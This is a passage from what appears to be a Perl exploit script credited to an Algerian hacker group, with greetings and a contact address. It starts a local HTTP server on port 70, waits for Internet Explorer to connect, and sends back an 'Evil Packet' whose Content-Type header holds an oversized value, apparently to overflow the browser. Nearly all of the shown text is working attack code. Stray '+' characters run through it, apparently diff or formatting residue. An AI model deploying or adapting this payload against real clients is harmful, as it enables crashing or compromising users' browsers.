Digital,Xodia,DelataAzize,AT4RE Team,all algerian hackers\n"; +print " Mail me at:Alpha_three3333(at)yahoo(dot)com\n"; print " BigGreetZ To: www.at4re.com,www.crownhacker.com\n"; +print"===================================================================\n"; print " [+] HTTP Server started on port 70... \n"; +print" [+]Try IExplore http://127.0.0.1/ \n"; +$z=$sock->accept(); print " [+]connection + Accepted!\n"; +do +{ + $ln=<$z>; + +print $ln; + chomp $ln; + + if (($ln eq "")||($ln eq "\n")||($ln eq "\r")) + { + +print " [<>]Sending Evil Packet\n"; + +print $z " HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone"; + +close($z); + +exit; + +} +} while (true); +